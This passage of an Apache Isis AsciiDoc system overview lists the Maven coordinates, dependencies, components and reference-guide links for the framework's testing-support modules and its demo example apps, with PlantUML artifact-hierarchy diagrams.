\/testing\/integtestsupport\/applib\n----\n|.Components\n****\no.a.i.testing.integtestsupport.applib.IsisIntegrationTestAbstract$InteractionSupport +\n****\n\n.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/integtestsupport\/applib\/ExceptionRecognizerTranslate.adoc[ExceptionRecognizerTranslate], xref:refguide:testing:index\/integtestsupport\/applib\/IsisIntegrationTestAbstract.adoc[IsisIntegrationTestAbstract], xref:refguide:testing:index\/integtestsupport\/applib\/IsisInteractionHandler.adoc[IsisInteractionHandler], xref:refguide:testing:index\/integtestsupport\/applib\/ThrowableMatchers.adoc[ThrowableMatchers], xref:refguide:testing:index\/integtestsupport\/applib\/swagger\/SwaggerExporter.adoc[SwaggerExporter], xref:refguide:testing:index\/integtestsupport\/applib\/validate\/DomainModelValidator.adoc[DomainModelValidator]\n****\n\n|Apache Isis Tst - Spec\/Cucumber (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport\nType: pom\nDirectory: \/testing\/specsupport\n----\n|Allows Cucumber to be used to write BDD-style specifications, generally as an alternative to integration tests.\n\n|Apache Isis Tst - Spec\/Cucumber (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport-applib\nType: jar\nDirectory: \/testing\/specsupport\/applib\n----\n|.Dependencies\n****\nio.cucumber:cucumber-java:jar:<managed> +\nio.cucumber:cucumber-junit-platform-engine:jar:<managed> +\nio.cucumber:cucumber-spring:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/specsupport\/applib\/IsisModuleTestingSpecSupportApplib.adoc[IsisModuleTestingSpecSupportApplib], xref:refguide:testing:index\/specsupport\/applib\/integration\/ObjectFactoryForIntegration.adoc[ObjectFactoryForIntegration], xref:refguide:testing:index\/specsupport\/applib\/specs\/V.adoc[V]\n****\n\n|Apache Isis Tst - Unit Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport\nType: pom\nDirectory: \/testing\/unittestsupport\n----\n|A module providing test utilities for unit testing of domain modules\n\n|Apache Isis Tst - Unit Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport-applib\nType: jar\nDirectory: \/testing\/unittestsupport\/applib\n----\n|.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework:spring-test:jar:<managed> 
+\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/unittestsupport\/applib\/IsisModuleTestingUnitTestSupportApplib.adoc[IsisModuleTestingUnitTestSupportApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/AbstractBeanPropertiesTest.adoc[AbstractBeanPropertiesTest], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForAnyPojo.adoc[FixtureDatumFactoriesForAnyPojo], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForApplib.adoc[FixtureDatumFactoriesForApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForJoda.adoc[FixtureDatumFactoriesForJoda], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForTime.adoc[FixtureDatumFactoriesForTime], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/PojoTester.adoc[PojoTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/AbstractApplyToAllContractTest.adoc[AbstractApplyToAllContractTest], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/BidirectionalRelationshipContractTestAbstract.adoc[BidirectionalRelationshipContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiator.adoc[Instantiator], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/InstantiatorSimple.adoc[InstantiatorSimple], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiators.adoc[Instantiators], xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTest_compareTo.adoc[ComparableContractTest_compareTo], xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTester.adoc[ComparableContractTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/files\/Files.adoc[Files], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jaxb\/JaxbMatchers.adoc[JaxbMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/Imposterisers.adoc[Imposterisers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/InjectIntoJMockAction.adoc[InjectIntoJMockAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/IsisActions.adoc[IsisActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JMockActions.adoc[JMockActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JUnitRuleMockery2.adoc[JUnitRuleMockery2], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/PostponedAction.adoc[PostponedAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointPublishingRule.adoc[SoapEndpointPublishingRule], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointSpec.adoc[SoapEndpointSpec], xref:refguide:testing:index\/unittestsupport\/applib\/core\/sortedsets\/SortedSetsContractTestAbstract.adoc[SortedSetsContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/streams\/NullPrintStream.adoc[NullPrintStream], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/CollectUtils.adoc[CollectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/IndentPrinter.adoc[IndentPrinter], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/ReflectUtils.adoc[ReflectUtils], 
xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/StringUtils.adoc[StringUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/value\/ValueTypeContractTestAbstract.adoc[ValueTypeContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/assertions\/Asserting.adoc[Asserting], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/matchers\/IsisMatchers.adoc[IsisMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/privatecons\/PrivateConstructorTester.adoc[PrivateConstructorTester], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/reflect\/ReflectUtils.adoc[ReflectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/repo\/FinderInteraction.adoc[FinderInteraction]\n****\n|===\n\n== Examples\n\n[plantuml,Examples,svg]\n----\n@startuml(id=Examples)\ntitle Examples - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Examples\\n[Software System]\" {\n rectangle \"==Demo - Domain\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Demo - JavaFX\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Demo - Parent\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Demo - Vaadin\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Demo - Web\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Demo - Wicket\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Examples)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Demo - Parent\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-parent\nType: pom\nDirectory: \/examples\/demo\n----\n|.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-persistence-jdo-dn5:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> 
+\norg.apache.isis.valuetypes:isis-valuetypes-markdown-persistence-jdo-dn5:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Domain\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-domain\nType: jar\nDirectory: \/examples\/demo\/domain\n----\n|.Components\n****\ndemoapp.dom.AppConfiguration +\ndemoapp.dom._infra.DefaultTitleProvider +\ndemoapp.dom._infra.LibraryPreloadingService +\ndemoapp.dom._infra.fixtures.DemoFixtureScriptSpecificationProvider +\ndemoapp.dom._infra.resources.AsciiDocConverterService +\ndemoapp.dom._infra.resources.AsciiDocReaderService +\ndemoapp.dom._infra.resources.MarkdownReaderService +\ndemoapp.dom._infra.resources.MarkupReaderService +\ndemoapp.dom._infra.resources.MarkupVariableResolverService +\ndemoapp.dom._infra.resources.ResourceReaderService +\ndemoapp.dom._infra.samples.NameSamples +\ndemoapp.dom._infra.urlencoding.UrlEncodingServiceNaiveInMemory +\ndemoapp.dom.domain._changes.EntityChangesSubscriberToCaptureChangesInMemory +\ndemoapp.dom.domain._commands.ExposePersistedCommands$TableColumnOrderDefault +\ndemoapp.dom.domain._interactions.ExecutionListenerToCaptureInteractionsInMemory +\ndemoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoEntities +\ndemoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoSeedService +\ndemoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoEntities +\ndemoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.ChildJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.seed.ChildJdoSeedService +\ndemoapp.dom.domain.objects.other.embedded.NumberConstantJdoRepository +\ndemoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoEntities +\ndemoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoSeedService +\ndemoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoEntities +\ndemoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoSeedService 
+\ndemoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoEntities +\ndemoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoSeedService +\ndemoapp.dom.domain.properties.PropertyLayout.navigable.FileTreeNodeService +\ndemoapp.dom.domain.properties.PropertyLayout.repainting.PdfJsViewerAdvisorFallback +\ndemoapp.dom.featured.customui.geocoding.GeoapifyClient +\ndemoapp.dom.services.core.errorreportingservice.ErrorReportingServiceDemoImplementation +\ndemoapp.dom.services.core.eventbusservice.EventLogEntryJdoRepository +\ndemoapp.dom.services.core.eventbusservice.EventSubscriberDemoImplementation +\ndemoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoEntities +\ndemoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoSeedService +\ndemoapp.dom.services.extensions.secman.apptenancy.ApplicationTenancyEvaluatorForDemo +\ndemoapp.dom.services.extensions.secman.apptenancy.entities.TenantedJdoEntities +\ndemoapp.dom.services.extensions.secman.apptenancy.entities.seed.TenantedJdoSeedService +\ndemoapp.dom.types.isis.blobs.jdo.IsisBlobJdoEntities +\ndemoapp.dom.types.isis.blobs.jdo.IsisBlobJdoSeedService +\ndemoapp.dom.types.isis.blobs.samples.IsisBlobsSamples +\ndemoapp.dom.types.isis.clobs.jdo.IsisClobJdoEntities +\ndemoapp.dom.types.isis.clobs.jdo.IsisClobJdoSeedService +\ndemoapp.dom.types.isis.clobs.samples.IsisClobsSamples +\ndemoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoEntities +\ndemoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoSeedService +\ndemoapp.dom.types.isis.localresourcepaths.samples.IsisLocalResourcePathsSamples +\ndemoapp.dom.types.isis.markups.jdo.IsisMarkupJdoEntities +\ndemoapp.dom.types.isis.markups.jdo.IsisMarkupJdoSeedService +\ndemoapp.dom.types.isis.markups.samples.IsisMarkupSamples +\ndemoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoEntities +\ndemoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoSeedService +\ndemoapp.dom.types.isis.passwords.samples.IsisPasswordsSamples +\ndemoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoEntities +\ndemoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoSeedService +\ndemoapp.dom.types.isisext.asciidocs.samples.IsisAsciiDocSamples +\ndemoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoEntities +\ndemoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoSeedService +\ndemoapp.dom.types.isisext.markdowns.samples.IsisMarkdownSamples +\ndemoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoEntities +\ndemoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoSeedService +\ndemoapp.dom.types.javaawt.images.samples.JavaAwtImageService +\ndemoapp.dom.types.javaawt.images.samples.JavaAwtImagesSamples +\ndemoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoEntities +\ndemoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoSeedService +\ndemoapp.dom.types.javalang.booleans.samples.WrapperBooleanSamples +\ndemoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoEntities +\ndemoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoSeedService +\ndemoapp.dom.types.javalang.bytes.samples.WrapperByteSamples +\ndemoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoEntities +\ndemoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoSeedService +\ndemoapp.dom.types.javalang.characters.samples.WrapperCharacterSamples +\ndemoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoEntities +\ndemoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoSeedService +\ndemoapp.dom.types.javalang.doubles.samples.WrapperDoubleSamples 
+\ndemoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoEntities +\ndemoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoSeedService +\ndemoapp.dom.types.javalang.floats.samples.WrapperFloatSamples +\ndemoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoEntities +\ndemoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoSeedService +\ndemoapp.dom.types.javalang.integers.samples.WrapperIntegerSamples +\ndemoapp.dom.types.javalang.longs.jdo.WrapperLongJdoEntities +\ndemoapp.dom.types.javalang.longs.jdo.WrapperLongJdoSeedService +\ndemoapp.dom.types.javalang.longs.samples.WrapperLongSamples +\ndemoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoEntities +\ndemoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoSeedService +\ndemoapp.dom.types.javalang.shorts.samples.WrapperShortSamples +\ndemoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoEntities +\ndemoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoSeedService +\ndemoapp.dom.types.javalang.strings.samples.JavaLangStringSamples +\ndemoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoEntities +\ndemoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoSeedService +\ndemoapp.dom.types.javamath.bigdecimals.samples.JavaMathBigDecimalSamples +\ndemoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoEntities +\ndemoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoSeedService +\ndemoapp.dom.types.javamath.bigintegers.samples.JavaMathBigIntegerSamples +\ndemoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoEntities +\ndemoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoSeedService +\ndemoapp.dom.types.javanet.urls.samples.JavaNetUrlSamples +\ndemoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoEntities +\ndemoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoSeedService +\ndemoapp.dom.types.javasql.javasqldate.samples.JavaSqlDateSamples +\ndemoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoEntities +\ndemoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoSeedService +\ndemoapp.dom.types.javasql.javasqltimestamp.samples.JavaSqlTimestampSamples +\ndemoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoEntities +\ndemoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoSeedService +\ndemoapp.dom.types.javatime.javatimelocaldate.samples.JavaTimeLocalDateSamples +\ndemoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimelocaldatetime.samples.JavaTimeLocalDateTimeSamples +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.samples.JavaTimeOffsetDateTimeSamples +\ndemoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimeoffsettime.samples.JavaTimeOffsetTimeSamples +\ndemoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimezoneddatetime.samples.JavaTimeZonedDateTimeSamples +\ndemoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoEntities +\ndemoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoSeedService 
+\ndemoapp.dom.types.javautil.javautildate.samples.JavaUtilDateSamples +\ndemoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoEntities +\ndemoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoSeedService +\ndemoapp.dom.types.javautil.uuids.samples.JavaUtilUuidSamples +\ndemoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoEntities +\ndemoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoSeedService +\ndemoapp.dom.types.jodatime.jodadatetime.samples.JodaDateTimeSamples +\ndemoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoEntities +\ndemoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoSeedService +\ndemoapp.dom.types.jodatime.jodalocaldate.samples.JodaLocalDateSamples +\ndemoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoEntities +\ndemoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoSeedService +\ndemoapp.dom.types.jodatime.jodalocaldatetime.samples.JodaLocalDateTimeSamples +\ndemoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoEntities +\ndemoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoSeedService +\ndemoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoEntities +\ndemoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoSeedService +\ndemoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoEntities +\ndemoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoSeedService +\ndemoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoEntities +\ndemoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoSeedService +\ndemoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoEntities +\ndemoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoSeedService +\ndemoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoEntities +\ndemoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoSeedService +\ndemoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoEntities +\ndemoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoSeedService +\ndemoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoEntities +\ndemoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoSeedService +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.testing:isis-testing-h2console-ui:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\norg.springframework.boot:spring-boot-configuration-processor:jar:<managed> +\n****\n\n|Demo - JavaFX\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-javafx\nType: jar\nDirectory: \/examples\/demo\/javafx\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.examples.apps:demo-domain:jar:${project.version} 
+\norg.apache.isis.incubator.viewer:isis-viewer-javafx-viewer:jar:${project.version} +\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui:pom:${project.version} +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui:pom:${project.version} +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Vaadin\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-vaadin\nType: jar\nDirectory: \/examples\/demo\/vaadin\n----\n|.Dependencies\n****\norg.apache.isis.examples.apps:demo-web:jar:${project.version} +\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-viewer:jar:${project.version} +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-vaa:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Web\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-web\nType: jar\nDirectory: \/examples\/demo\/web\n----\n|.Components\n****\ndemoapp.web._infra.utils.ThereCanBeOnlyOne +\n****\n\n.Dependencies\n****\norg.apache.isis.examples.apps:demo-domain:jar:${project.version} +\norg.apache.isis.extensions:isis-extensions-command-replay-primary:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-replay-secondary:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.springframework.boot:spring-boot-starter:jar:<managed> +\norg.springframework.boot:spring-boot-starter-actuator:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\n****\n\n|Demo - Wicket\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-wicket\nType: jar\nDirectory: \/examples\/demo\/wicket\n----\n|.Components\n****\ndemoapp.webapp.wicket.ui.custom.WhereInTheWorldPanelFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.examples.apps:demo-web:jar:${project.version} +\norg.apache.isis.extensions:isis-extensions-pdfjs-ui:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-ui-wkt:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-ui-wkt:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:2.0.0-SNAPSHOT +\norg.apache.isis.viewer:isis-viewer-wicket-viewer:jar:2.0.0-SNAPSHOT +\n****\n|===\n\n== Root\n\n[plantuml,Root,svg]\n----\n@startuml(id=Root)\ntitle Root - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor 